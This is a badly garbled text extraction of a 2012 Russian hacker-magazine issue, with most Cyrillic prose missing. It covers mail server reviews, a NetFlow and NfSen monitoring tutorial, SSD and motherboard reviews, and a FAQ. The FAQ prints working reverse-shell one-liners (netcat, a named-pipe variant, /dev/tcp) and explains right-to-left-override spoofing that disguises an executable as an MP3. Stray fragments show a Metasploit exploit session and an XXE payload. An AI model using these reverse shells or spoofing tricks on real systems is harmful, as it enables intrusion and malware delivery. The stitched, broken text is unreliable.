(SMTP/POP3/IMAP) , ,
, Gecad Technologies.

-, Ajax,
.
,
.
:
, , ,
.
/
CSV
. ,
, ActiveSync
, .

.
- ( 9000- ), .
.
LDAP-
( OpenLDAP eDirectory)
126
08 /163/ 2012
CommuniGate Pro
: CommuniGate Pro
: communigate.com
: Free/
: *nix, Windows, Mac OS X

, IM, VoIP, . , VoIP
/ , ,
(IVR), , ,
. CommuniGate
( ), IPv4
IPv6, SMTP, SIP, IMAP,
XMPP, LDAP, RADIUS, XIMSS, CalDAV, WebDAV,
MAPI .
(Session Border Controller)
NAT-. CGP LDAP- .
BlackBerry
AirSync ( ).

. ,
.

-,
, . -
,
(
). -

PDA
WAP . VoIP
- .

, , POP3-, ,
.

. ,
,
.

.
(,
), SIP Farm.
. ,
CommuniGate Pro IP-
SIPNET.

, Active Directory
, .
IP-,
.
, ,
SSL, TLS,
S/MIME .
API .

. -
- CommuniGate Pro
,
Sophos, McAfee, MailShell, Cloudmark.
,
DNSBL (RBL),
IP- ,

.
, ,

. , ( 8010- ,

).
,
, .

, .
Community Edition,
, Corporate Edition Service
Provider .
ZENTYAL
, Linux ,
, .
Zentyal (zentyal.org) ,
Ubuntu Server ( Ubuntu 12.04 LTS)
. Zentyal
, UTM,
.
/. ,
. Zentyal ,
, master/slave
LDAP/AD.
08 /163/ 2012

,

. , .

iRedMail, Axigen Rumble;
,
,
Axigen, IndiMail CommuniGate
Pro. VoIP. z
127
SYN/ACK
SYN/ACK
(grinder@synack.ru)

NETFLOW

,

: , ,
.
,
NetFlow.
NETFLOW
NetFlow Cisco
(goo.gl/vM2l7) , .
, NetFlow Cisco,
( Juniper Enterasys) .
. NetFlow v1,
1990 , ,
( , ),
.
Netfilter. , 2004
RFC 3954. v9 IPFIX (IP Flow Information Export, RFC 3917),
NetFlow v10. v24
Cisco, .
v5,
IPv4-. ,
(flow record) TCP/IP. v5 , ,
, IP , , TOS- TCP-.
IPv6, MPLS, BGP -
128
. , Cisco ASA NetFlow . ,

v9 (Network Security Event
Logging, NSEL), .
NetFlow-:
( ,
flows) .
,
. , , ,
;
, UDP
SCTP (Stream Control Transmission Protocol),
; .
2055- , 9555, 9995 ,
;
( ).
,
, : + + .
,
.
UDP-, UDP
. , , .
v8 v9,
.
SCTP.
,
NetFlow NetFlow: ,
,
, , . UDP ,
, UDP .
samplicator (code.google.com/p/samplicator),
UDP . ,
. TCP,
,
, -
( ,
). , ,
Sampled NetFlow, , -
08 /163/ 2012
IP- fprobe
, (
). , Sampled NetFlow
, ,
.
$ sudo nano /etc/default/fprobe

# "any"
INTERFACE="eth0"
FLOW_COLLECTOR="192.10.0.2:9001"
# ; , "-f"
# ;
# IP-, "-fip"
OTHER_ARGS="-fip"
fprobe , ,
, ( r
0), (B q),
(t). tcpdump .
LINUX
NetFlow
, DD-WRT . ,
VMware vSphere 5
NetFlow v5,
. ,

. Cisco NetFlow
192.10.0.2:9001 :
router(config)#
router(config)#
router(config)#
router(config)#
router(config)#
interface fastethernet 0/0

ip route-cache flow
ip flow-export version 5 origin-as
ip flow-export 192.10.0.2 9001
ip flow-cache timeout active 5
NetFlow-, :
fprobe (fprobe.sourceforge.net) Linux,
libpcap, fprobe-ulog, libipulog;
ipt-netflow Linu :
iptables;
softflowd (code.google.com/p/softflowd) Linux/FreeBSD,
NetFlow v1/v5/v9;
pfflowd (mindrot.org/projects/pfflowd) OpenBSD;
nProbe (ntop.org/products/nprobe) / Linux, FreeBSD Windows, NetFlow v5/v9/
IPFIX;
IPCAD (lionet.info/ipcad) Linux, FreeBSD, OpenBSD, Mac
OS X/Darwin Solaris, raw BPF-, PCAP,
iptables ULOG & IPQ;
fSonar (softpiua.com/ru/products/softpi/fsonar.html)
Windows, NetFlow v5/v9;
ndsad (ndsad.sf.net) , NetFlow v5
Windows (winpcap), Linux (libpcap), Mac OS X FreeBSD;
PRTG Network Monitor (paessler.com/netflow_monitoring) Windows XP
( ).
$ sudo tcpdump -n udp port 9001
,
NetFlow: -T cnfp. Softflowd. ,
, , .
+

.
flow-tools,
, . flow-tools
Perl- FlowScan
(caida.org/tools/utilities/flowscan),
flow-capture ( NetFlow flow-tools) RRD. FlowScan
: CUFlow,
CampusIP, SubNetIO. ,
nfdump (nfdump.sf.net), NetFlow v1/v5/
v7/v9 IPFIX ( ),
NfSen (Netflow Sensor, nfsen.sf.net).
NSEL- nfdump, Cisco ASA. nfdump
: nfcapd (,
), nfdump ( ), nfprofile ( ,
,
NetFlow, . ,
Ubuntu/Debian
.
$ sudo apt-get install fprobe

, ( IP- ).
.
/etc/default/fprobe:
08 /163/ 2012
NetFlow- tcpdump
129
SYN/ACK
SYN/ACK
), nfreplay (
/), nfclean.pl
( ), ft2nfdump ( flow-tools
nfdump). nfcapd
( ,
), nfdump.
, nfdump Ubuntu/Debian
:
NFSEN
NfSen (sf.net/apps/
trac/nfsen-plugins).
plugins, nfsen.conf,
.
$ sudo apt-get install nfdump
nfcapd nfdump
NfSen. nfdump
, , /etc/default/nfdump:
$ cat /etc/default/nfdump
# nfcapd is controlled by nfsen
nfcapd_start=no
, .
nfcapd-, UDP-:
NFSEN
NfSen. ,
. PHP Perl,
RRDtool. LAMP-
Perl- Mail::Header Mail::Internet. :
$ sudo apt-get install apache2 libapache2-mod-php5 \
php5-common libmailtools-perl rrdtool librrds-perl
$ sudo nfcapd -w -D -l /var/cache/nfdump/router1 -p 9001
, ,
'-b'. '-R host/port'
NetFlow- .
'-p' , pcap-.
nfdump, :
$ sudo nfdump -R var/cache/nfdump/router1
Date flow start Duration Proto Src IP Addr:Port Dst IP
Addr:Port Packets Bytes Flows
2012-07-05 10:09:12.112 0.001 UDP 22.22.22.22:1234 ->
192.10.19.10:22 1 400 1
$
$
$
$
wget -c http://goo.gl/CYk4s
tar xzvf nfsen-1.3.6p1.tar.gz
cd nfsen-1.3.6p1
cp etc/nfsen-dist.conf etc/nfsen.conf
.
, , .
, , ,
nfdump
(line, long, extended custom),
line. ,
'-o'. nfdump , ,
man nfdump,
.
$ nano etc/nfsen.conf
$BASEDIR = "/usr/nfsen";
# ,
$HTMLDIR = "/var/www/nfsen/";
# , nfdump
$PREFIX = '/usr/bin';
# , -
$USER = "www-data";
$WWWUSER = "www-data";
$WWWGROUP = "www-data";
# , ,
# "col"
, NfSen
, Flowscan
130
08 /163/ 2012
, NfSen
NfSen
%sources = (
'ROUTER1' => { 'port' => '9001',
'col' => '#0000ff', 'type' => 'netflow' },
);
$ sudo update-rc.d nfsen defaults 20
Apache:
$ sudo nano /etc/apache2/conf.d/nfsen.conf
<Directory /var/www/nfsen/>
DirectoryIndex nfsen.php
</Directory>
$MAIL_FROM = 'admin@example.com';
$SMTP_SERVER = 'smtp.example.com';
, nfcapd, ,
. .
$ sudo ./install.pl etc/nfsen.conf
Perl-,
nfsen.conf . nfsen, nfcapd:
$ sudo /usr/nfsen/bin/nfsen start
:
$ sudo ln -s /usr/nfsen/bin/nfsen /etc/init.d/nfsen
http://_/nfsen/nfsen.
php
. ,
IP-, .
any, proto TCP. ,
SSH-, src or dst port 22,
IP . Live,
, nfsen.conf.
, (Live New Profile).
, . z
PMACCT
Pmacct
,

: ISP, IXP, CDN, , - .
Linux, *BSD, Solaris
. IPv4 IPv6,

(libpcap, Netlink/ULOG, NetFlow v1/v5/v7/
v8/v9, sFlow v2/v4/v5 IPFIX),
(IPFIX,
NetFlow v5/v9 sFlow v5)
memory tables, MySQL, PostgreSQL, SQLite,
BerkeleyDB .
, ,
,
08 /163/ 2012
, .
BGP-
IS-IS/IGP-
, BGP/
MPLS VPNs (RFC 4364).
(GTP).

, RRDtool, GNUPlot,
Net-SNMP, MRTG Cacti.

.
,
Pmacct, BWstat,
pNRG, pmGraph, netactuator, FloX (Flow eXplorer),
pmacct-frontend .
WWW
INFO
Cisco,
NetFlow:
goo.gl/vM2l7;

NetFlow 5 9.
FreeBSD
Softflowd: code.google.
com/p/softflowd;

UDP

samplicator
(code.google.com/p/
samplicator).
OpenBSD pfflowd: mindrot.

org/projects/pfflowd;
nfdump:
nfdump.sf.net;

nfdump NfSen: nfsen.
sf.net.

,

,

.
WARNING
Sampled NetFlow
,

.
131
FERRUM
BE QUICK
OR BE DEAD

SATA 3.0
, , ,
.
, : 480 SSD

? 120 256
.
SANDFORCE

, , ,
. ,
HDD,
. , SSD
.
,
:
- SSD.

. , Apple
NVIDIA, SandForce, , ,

LSI Corporation. , SandForce, ,

NAND-,
SSD .

Marvell, SandForce
SF-2281. Intel
,

Intel SSD 520 Series.
132

,
, ,
,
. ,
. ,
:
/ 500 /, SandForce SF-2281,
.
? ,

SSD, -,

.
,
Toggle-mode DDR NAND.
,

SandForce

/

SSD.

?

.
,
-.

5/5 /,
SSD.
, , JPG, MP3
, .
/

SSD , /
. ,

. , -
Corsair CSSD-F120GBGT-BK
Corsair CSSD-P128GBP-BK
Intel SSDSC2CW240A3K5
KINGMAX KM240GSMP35
Kingston SH100S3/120G
OCZ VTX3-25SAT3-240G
Plextor PX-256M3P
PNY P-SSD2S120G3-BLK
Verbatim SSD SATA III
. SSD
, . 2 ,
, ,
3- .
, ,

SandForce.

(
).
SSD PCMark Vantage
( HDD) , .
,

. ATTO Disk Benchmark
, SSD
,
,
HDD.
(
128 ) ( 4 )

Iometer.
, ,
. , 240
120

SandForce. .

: Intel Core i7-3960X, 3300
: ASUS P9X79 PRO
: 4 4 , G.SKILL F31700CL9-4GBZH, DDR3 1600
: Sapphire Radeon HD 3450
: Corsair CSSD-F120GB2-BRKT
: Corsair CP-9020006
: Windows 7 , 64-
08 /163/ 2012
Be quick or be dead
CORSAIR CSSDF120GBGT-BK
orsair SSD SATA 3.0: Force
Series 3, Perfomance
Series Pro Force Series GT.

. ,
, . 3,5 2,5- .
Corsair CSSD-F120GBGT-BK SandForce SF-2281 ,
25- .
,
/ Iometer,
Intel.
,
SSD 120 ,
. ,
1,7 .
6000
.
INTEL SSDSC2CW240A3K5
Intel SSD 520 Series SATA 3.0 Cherryville
, SSD 60 480 .
, 510- . ,

Marvell 88SS9174-BKK2, Cherryville ,
-, SandForce SF-2281.
SSD Toggle-mode DDR
NAND 25 .
. :

SSD: SATA, Molex SATA, - -. , ,
,

, Intel. , Intel
SSDSC2CW240A3K5 .
12 600
.
08 /163/ 2012
133
FERRUM
KINGMAX KM240GSMP35
KINGMAX
: , , HDD,
, ,
. SSD
- 2,5 , mSATA Half-Slim.
KINGMAX KM240GSMP35 . ,
SSD . SandForce
SF-2281 , KINGMAX KM240GSMP35 . ,
, , , , 25 .
:
, . KINGMAX SMP35
Client (, ), , Intel
SSDSC2CW240A3K5, Molex SATA- , . KINGMAX SMP32 Client,
, .
8800
.
, OCZ . ,
SSD SandForce ,
. OCZ
,
. OCZ VTX3-25SAT3-240G
OCZ Vertex 3 SATA III 2.5''
SSD. ,
. , OCZ
1 ,
. OCZ VTX3-25SAT3-240G
, , , . , OCZ
SSD
, 2011 Indilinx.
OCZ VTX3-25SAT3-240G.
- ,
My SSD is faster than your HDD.
-:
:
:
:
:
:
:
:
134
Corsair CSSDF120GBGT-BK
2,5
SATA 3.0
MLC, , 25
SandForce SF-2281
555 /
515 /
2
20
11 400
.
KINGMAX
KM240GSMP35
2,5
SATA 3.0
MLC, Toggle-mode DDR NAND, 25
SandForce SF-2281
550 /
520 /
1,2
240
2,5
SATA 3.0
MLC,
SandForce SF-2281
550 /
520 /
1,2
240
08 /163/ 2012
Be quick or be dead
VERBATIM SSD SATA III

Verbatim ,
.
, , ,
.
:
SSD.
2,5- .
, 2
.
SSD . , -
,
Verbatim SATA II:
USB, . Verbatim SSD SATA III
.
5200
.
KINGSTON SH100S3/120G
, Kingston SH100S3/120G -
SSD SATA 3.0,

. ,
,
.
, .
SandForce
SF-2281, ,
25- .
3,5 . ,
, Kingston
SH100S3B/120G ,
. SATA-, , , 2,5-
USB 2.0 Acronis.
,
SSD,
HDD .
6600
.
OCZ VTX325SAT3-240G
2,5
SATA 3.0
MLC, , 25
SandForce SF-2281
550 /
520 /
2
240
08 /163/ 2012
Verbatim SSD
SATA III
2,5
SATA 3.0
MLC
SandForce SF-2281
550 /
510 /
2
120
Kingston
SH100S3/120G
2,5
SATA 3.0
MLC, , 25
SandForce SF-2281
555 /
510 /
1
120
,
. -
SSD, Intel SSDSC2CW240A3K5.
,
, ,
, -
. z
135

PCMARK VANTAGE,
PCMARK VANTAGE, /
KINGMAX KM240GSMP35
KINGMAX KM240GSMP35
Verbatim 47378
Verbatim 47378
0
00
60 0
00
58 0
00
56 0
00
54 0
00
52 0
00
50 0
00
48 0
00
46
PCMark Vantage
0 50 100 150 200 250 300 350 400 450
Windows Defender
Gaming
Improting Pictures to Windows photo Gallery
Windows Vista startup
Video editing using Windows Movie Market
Windows Media Center
Adding music to Windows Media Player
Application loading

PCMark Vantage

IOMETER: /
(4 ), /
IOMETER:
/ (128 ), /
KINGMAX KM240GSMP35
KINGMAX KM240GSMP35
Verbatim 47378
Verbatim 47378
10
15
20
Marvell
300
320
340
360
380
Iometer Marvell
IOMETER PATTERNS, /
KINGMAX KM240GSMP35
Verbatim 47378
Database
Fileserver
Workstation
Webserver
10
20
30
40
50
60
70
400
12 2200 .
6 1260 .
,
!
.
: 210

GOOGLE CHROME 030
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
LULZSEC / FOX NEWS
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .

WINDOWS 7
PHPMYADMIN
064

ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS

+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (

, , ).
FERRUM
, ,
Z77 !
GIGABYTE
G1.SNIPER 3
: LGA1155
: Intel Z77 Express
: 4 DIMM,
DDR3 1066-2666
: 4PCI Express
x16, 2PCI Express x1, 1PCI
: 6SATA
3.0, 4SATAII, 1mSATA
: 5.1 Creative CA0132
: 1Intel 1000 /,
1Qualcomm Atheros Killer E2201
1000 /
:
1HDMI, 1DisplayPort, 1DVI-D,
1D-Sub, 1PS/2, 2RJ-45,
6USB 3.0
-: E-ATX

: Intel Core i5-2500K,
3,3
: MSI TWIN FROZR II
HD 5830, 1024
: G.Skill
Ripjaws-Z F3-17000CL9Q-16GBZH,
24
: Corsair CSSDF120GB2, 120
: ENERMAX Platimax,
750
: Windows 7
Super Pi 1.5XS 1m: 10,058

wPrime 1.55 32m: 8,963
wPrime 1.55 1024m: 285,55
WinRAR: 3111 /
CINEBENCH R11.5: 5.5
138
11 700
.
08 /163/ 2012
, , Z77 !
, ,
Z77 Express H77 Express.
Ivy Bridge, , GIGABYTE G1.Sniper 3.

GIGABYTE G1.Sniper 3 : -

.
,
, G1-Killer.
,
PCI Express x16,

.
,
12.

, , , .

?

PCI Express x16 .

x16 + x16, 16 + 8 + 8,
8 + 8 + 8 + 8.
Intel Ivy Bridge PCI Express x16
16, PLX PEX8747 GIGABYTE
16. !

ATX4P,
ATX12V.

, SATA.

Intel
. , DMI 2.0. C ,

.
,
USB 3.0 DMI 2.0. USB 3.0
Intel.
16 PCIe , .
08 /163/ 2012
- E-ATX,
. PCI Express
x16, PCI Express x1
- PCI.
.
SSD
mSATA.
,
.
GIGABYTE G1.Sniper 3 ,
. 64
,
HDD SSD. ,
.
. , Reset,
BIOS,
POST-.

.
SATA-, .

, RAID
0/1/5/10. SATA 3.0, CPU,
Marvell 88SE9172,
RAID 0 RAID 1.
I/O- : RJ-45, HDMI, DisplayPort,
DVI-D, D-Sub, USB 3.0,

USB 2.0.
S/PDIF.

GIGABYTE G1.Sniper 3 GIGABYTE Ultra
Durable 4,
,

. ,
, ,
.
BIOS,

. UEFI BIOS,
GIGABYTE
.
, .
G1-Killer

(Killer Game Networking Intel
Gigabit Ethernet) ,
Creative.

USB 3.0
,
. Bluetooth 4.0
Wi-Fi 802.11n,
PCI Express x1,
.

GIGABYTE G1.Sniper 3 ,

GIGABYTE ,
. GIGABYTE G1.Sniper M3
- mATX, PEG-,
PCI Express x1,
2400 ,
SATA II SATA 3.0 RJ-45
. ,
.

GIGABYTE G1.Sniper 3 .
Super Pi 1.5XS
1
,
. wPrime 1.55
, 32 1024
, .

CINEBENCH R11.5 WinRAR
.
,
, . ,
,
Intel

.
,
. GIGABYTE
G1.Sniper 3, ,
,
Wi-Fi 802.11n Bluetooth 4.0,

PCI Express x16. z
139
FAQ
, Digital Security (cherboff@gmail.com)
FAQ

FAQ@REAL.XAKEP.RU

IDE,

.
?
IDE A
, ,
,
.

,
.
,

EditorConfig (bit.ly/editorconfig).
,
,
,
Notepad++ Sublime Text 2
Emacs Visual Studio.
.editorconfig.
.htaccess, - Apache,
.
, .
, .
-:
;
;
root = true
;
[*.py]
;
indent_style = space
;
indent_size = 4
;
end_of_line = LF
Linux
Netcat,
'-e' '-c',
?
Netcat
A TCP/IP.
,
-
? ;-)
.
, . -
, .
Netcat bash
, FIFO-.

nc -e /bin/bash 192.168.1.13 1337
:
mkfifo pipe;
cat pipe|/bin/bash|
nc 192.168.1.13 1337 >pipe;
rm pipe
\
\
\
bash
,
Netcat,
TCP, /dev/tcp.
- :
/bin/bash -i >
/dev/tcp/192.168.1.13/1337
0<&1 2>&1
\
\
:
Windows
ARP-poisoning?
,
A
HTTP-
, ,
,

. HTTP ,

Burp Suite
.
140

Burp.
( Proxy Options)
,
loopback-, Generate CA-signed per-host
certificates. ,
ProxyDroid ( Google Play),

.

,
, .
Burp Suite IP .
, ,

, , Generate a
CA-signed certificate with a specific hostname,
.
08 /163/ 2012
MITM-

. ARP-

VBS
.

DecaffeinatID (bit.ly/decaffeinatid) ARPFreeze
(bit.ly/arpfreeze).
Irongeek

.
IDS,

ARP-,
(
) .

. ARPFreeze ,
GUI- netsh ARP,
DecaffeinatID

IP- MAC-.
,
ARP-,
,

.
Android Google Play ?

A
, , ,

apk-. , , ! :-)

Chrome APK Downloader (bit.ly/apkdownload).
,

.
FiletypeID
(bit.ly/filetypeid).
4720 ,

. ,

50/50, ,
,
(Fat elf),
,
.

,
.
?
, ,
, ,
Hex-,
,
ANDROID, SSL?

. IE
, Burp,
.
, , . ,
,
. .
08 /163/ 2012

,

,
,

.
cer- SD- .
Location & Security
Install from SD card
.
Profit!
,
,
.
, , - ,
Proxy Burp Suit

.
141
FAQ
,

, - . , ,
/, Device ID,
.
Device ID, Google Play.

, apk-
,
,
.

Windows,
?
Windows
A
,
.

, .exe
,

-
(RIGHT-TOLEFT OVERRIDE).
,

.
,
justafile3pm.exe
- u\202e
e 3. - .exe, ,

justafileexe.mp3
RLO- , U+202E:
Right-To-Left Override.

TCP?

A
, ,
,
TCP-data , .

Matasano Port Forwarding
Interceptor,
.
PFI TCP- .
IP- , ,
142
Matasano Port Forwarding Interceptor
,
. /
TCP-.

,
. ,

,

.
HDMI HEC.
HEC (HDMI Ethernet

Channell),

,
HDMI 1.4,
2009 .

HDMI- (,
).
,
.
,
Fast Ethernet
100 / full
duplex. ,
,
. ,
HEC
, HDMI 1.4.
.

DOMXss?
, DOMXss
A
,
,
.
,

.

Firefox DOMinator (bit.ly/domxsstool).

.
-
?
DDoSA , -

- -.

, , ,
.
, ,
,
.
ApacheBench (ab).

,
- Apache.
, ab
URL , ,
,
.
URL.
ab -n 10000 https://myservice.tst/
myscript.php

.
:
,
HTTP-,
HTTP-, ,
POST PUT.

SSL- (SSL2, SSL3, TLS1)
. z
08 /163/ 2012
>Net
AthTek NetWalk
BWMeter 6.2.2
Connectify 3.5.1
DNSDataView 1.40
GMail Drive 1.0.19
GNS3 0.8.2
IMAPSize 0.3.7
mRemoteNG 1.69
>Multimedia
AIMP 3.10
doPDF 7.3.381
Fotobounce 3.7.2
FotoSketcher 2.30
Foxit Reader 5.3.1
Machete Lite 3.8
MetatOGGer 4.5
MPTagThat 3.0.7
Okozo Desktop 2.1.1
Poladroid 0.9.6
SaveGameBackup.net 1.41
Sculptris Alpha 6
Similarity 1.7.1
SMRecorder 1.2.4
SPlayer 3.7
VidCoder 1.3.2
YACReader 0.4.5
>Misc
Auspex 1.3.5.118
AutoHotkey 1.0.48.05
AutoIt 3.3.8.1
Boot Snooze 1.0.5
ClipX 1.0.3.9
File Bucket 1.1.0
FluffyApp 2.0b4
Input Director 1.2.2
ManicTime 2.3
Moo0 FileShredder 1.17
OnTopReplica 3.3.2
QTTabBar 1.5.0.0
Registry Commander 12.01
RidNacs 2.0.3
SnakeTail 1.6
TreeSize Free 2.7
UltraSearch 1.6
>>WINDOWS
>Development
ActivePerl 5.14.2
ActivePython 2.7.2
ActiveTcl 8.5.11
Aptana Studio 3.2.0
Arcadia 0.11.1.2
CodeLobster PHP Edition 4.2.1
DEV-C++ 4.9.9.2
Dojo Toolkit 1.7
HTTP Debugger Pro 4.6
Komodo IDE 7.0.2
LispIDE 20100318
Nemerle 1.1
PluThon 2.0.0
PyDev 2.6.0
ReSharper 6.1.1
SQL Uniform 2.1.1
SQLiteStudio 2.0.27
WaveMaker 6.4.6
>Devel
Blueprintcss 1.0.1
Buildroot 2012.05
Cascading 2.0
Cool-php-captcha 0.3.1
>>UNIX
>Desktop
Avidemux 2.5.6
Datacrow 3.9.14
Digikam 2.6.0
Djvusmooth 0.2.12
Easyimagesizer 3.0.5
Emacs 24.1
Ffmpeg 0.11.1
Flvmeta 1.1.0
Gmsh 2.6.0
Gmtp 1.3.3
J7z 1.2.0
Krut 0.9.3
Mplayer 1.1
Pdf2djvu 0.7.13
Photofilmstrip 1.5.0
Piedock 1.6.1
Qtractor 0.5.5
Vidrop 0.6.8
>System
Cameyo 2.0.831
CCEnhancer 3.4
CCleaner 3.20
CPU-M Benchmark 1.3
CrystalDiskInfo 5.0
DHE Drive Info 3.2.493
Disk Investigator 1.31
DriverIdentifier 4.1
HWiNFO32 4.00
IObit Uninstaller 2.2
Logstalgia 1.0.3
Moo0 SystemMonitor 1.64
RouterPassView 1.40
Soluto 1.3 Beta
UnknownDevices 1.5.2
WinContig 1.10
>Security
Alpha3
API Monitor 2
BoxCryptor 1.3.2
Hook Analyser 2.0
JSDetox 0.1.0
kbsslenforcer
Pafish
pdbparse
PEFrame 0.2
pev 0.5
PowerSploit
pyloris 3.2
Wireshark 1.8.0
Nemesis 1.4
Odysseus 2.0.0.84
Pamela 4.8
Probe Web Server 1.0
RFIDIOt 1.0a
UltraVNC 1.0.9.6.2
VodBurner 1.0.5
Xfire 1.149
>Server
Apache 2.2.22
Asterisk 10.5.1
Bind 9.9.1-p1
Cups 1.5.3
Dhcp 4.2.4
Dovecot 2.1.7
Freeradius 2.1.12
Lighttpd 1.4.31
Mysql 5.5.24
Nsd 3.2.10
>Security
Barada 0.5.3
Clamav 0.97.5
Clonewise
Dnscrypt 0.10.1-2
guile-dlhacks
Intersect-2.5
kbsslenforcer
Laudanum 0.4
Netusse
Netzob 0.3.3
pdbparse
pev 0.5
pyloris 3.2
qcombbdbg
Ratproxy 1.58
Squert 0.9.2
Subterfuge 3.0 beta
Websitecds 1
Wireshark 1.8.0
WPSCrackGUI 1.1.8
>Net
Amsn 0.98.9
Damnvid 1.6
Dante 1.4.0pre1
Eiskaltdcpp 2.2.7
Evolution 3.4.3
Firefox 13.0.1
Frei-chat 7.2
Gmail-plasmoid 0.7.20
Googlecl 0.9.13
Httppp 1.2.0
Liferea 1.8.6
Lince 1.3
Myagent-im 0.4.6
Opera 12.00
Skype 4.0.0.7
Uhub 0.4.0
Voicechatter 1.5.0
Wfs 2.01
Geany 1.22
Gecrit 2.8.3
Haskell-platform 2012.2.0.0
Iep 3.0
Kcov 9
Kyua 0.4
Libzdb 2.10.4
Liteide 12
Liwc 1.21
Nal 20110221
Phpgrid 1.4.1
Pypy 1.9
Rstudio 0.96.304
Ruby 1.9.3p194
>>MAC
Bean 3.2.0
Emacs 24.1
FlashToHTML5 1.8
iMediaHUD 1.2.7
JaBack 9.15
keka 1.0.3
KeyRemap4MacBook 7.8.0
MacRuby 0.12
OSXFUSE 2.4.2
Palringo 4.6.2
Raw Photo Processor 4.6.0
SABnzbd 0.7.0
Sleipnir 3.5.0.1
SoundSource 2.5.1
Sparrow 1.6.2
SQLite 3.7.13
TRIM Enabler 2.2
VUWER 1.5.5
>X-distr
Oracle Linux 6.3
>System
Bindfs 1.10.4
Bumblebee 3.0
Catalyst 12.4
Cfengine 3.3.4
Crush 2012-02
Guacamole 0.6.0
Meld 1.6.0
Nouveau 1.0.1
Oobash 0.39.5
Ppss 2.97
Psmisc 22.19
Qemu 1.1.0-1
Sali 1.5.2
X11 7.7
Xenomai 2.6.0
Openldap 2.4.31
Openvpn 2.2.2
Postfix 2.9.3
Postgresql 9.1.4
Pure-ftpd 1.0.35
Samba 3.6.6
Sendmail 8.14.5
Snort 2.9.2.3
Sqlite 3.7.13
Squid 3.1.20
Syslog-ng 3.3.5
Unbound 1.4.17
Vsftpd 3.0.0
07 (163) 2012
FAQ
WWW2
SEPROX
-
API
seprox.ru
, .
( ), IP , - ,
. ? , seprox. -
. :
(SOCKS/HTTP), , , (GET, POST, cookies, referrer, SSL),
.
-. API,
, , HTTP- . : http://bit.ly/OtVlRG.
mathics.net
,
MATLAB Octave
. Mathics. ,
Mathematica.
, GitHub
Python, , mathics.net .
, ,
, -
. , .
, .
www.peeep.us
, ,
( , ,
), , ,
. Peeep.us,

www.peeep.us/eae7be19. ,
HTML/JS- . , -
- , .
attachments.me
,
.
, , : , , Photos Dropbox-. . ,
. Dropbox
Google Drive Box. Gmail Chrome, .
: , Gmail
.
MATHICS
PEEEP.US
ATTACHMENTS.ME
144
08 /163/ 2012

Хакер 2012 08 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2012 08 PDF

Загружено:

Авторское право:

Доступные форматы

026

Windows Phone 7.5

GOOGLE CODE JAM

Google Code Jam ,

57% , Business Software Alliance.

WINDOWS 8 SECURE BOOT

Unified Extensible Firmware

POSITIVE HACK DAYS 2012

<!ENTITY % a SYSTEM 'http://

select * from LastFm where

100 000 WINDOWS PHONE MARKETPLACE, Microsoft.

Intel Ivy Bridge, ,

1 246 713 URL 24 129 Google .

6 458 020 LinkedIn 1,5 MD5-

(Millennium Technology Prize

NOKIA , Nokia AIR.

Balsamiq Mockups (www.balsamiq.com). Adobe AIR

cid: (credentials) OTC

WiFi Pineapple Mark IV

ALFA USB WiFi AWUS036NHA

16dBi Yagi Antenna

USB Rubber Ducky

RFID 13.56MHz Mifare

MiniPwner, Pwn Plug

NETWRIX INACTIVE USERS TRACKER

MAILARCHIVA OPEN SOURCE EDITION

PERFORMANCE ANALYSIS OF LOGS

PowerShell v2.0+, MS .NET Framework 3.5SP1 MS Chart Controls for

Management. , Empty Password User Report ,

FREE ACTIVE DIRECTORY TOOLS

COMODO TIME MACHINE

Free Active Directory Tools 13

CORE CONFIGURATOR 2.0 FOR SERVER CORE

EXCHANGE 2010 RBAC MANAGER

Cotton Candy Android 4.0 Ice Cream

CUBOX: DBUS UBUNTU

apt-get install python-software-properties

AllWinner A10 , Raspberry Pi:

- Android Ice Cream

Amlogic AML8726 ARM Cortex A9 (65 ),

Android 4.0 Ice Cream

Android 4.0 Ice Cream

Samsung Exynos 4210,

Marvell Armada 510

TI OMAP 4460 ARM

NVIDIA Tegra 2, 1,2

ARM Cortex-A8, 1,5

Vivante GC600 Marvell

NVIDIA GeForce GPU

SD, SSD, SATA

Wi-Fi 802.11 b/g/n

GreenDog , Digital Security (twitter.com/antyurin)

Python M2Crypto (goo.gl/nCw8W).

2>&1 && @echo This works

[+] 127.0.0.1:3306 Successful exploited the authentication

handling. This exception may be expected and handled.

eax=02dbac01 ebx=0013e2e4 ecx=02dbac10

> use exploit/windows/browser/adobe_flash_rtmp

Started reverse handler on 10.0.1.3:4444

Current server process: iexplore.exe (2856)

Sanjar Satsura (satsura@r00tw0rm.com, twitter.com/sanjar_satsura)

Super music uploaded by 3pm.SCR

FILE NAME SPOOFING

zlib., bzip2., convert.iconv.*, string.rot13, string.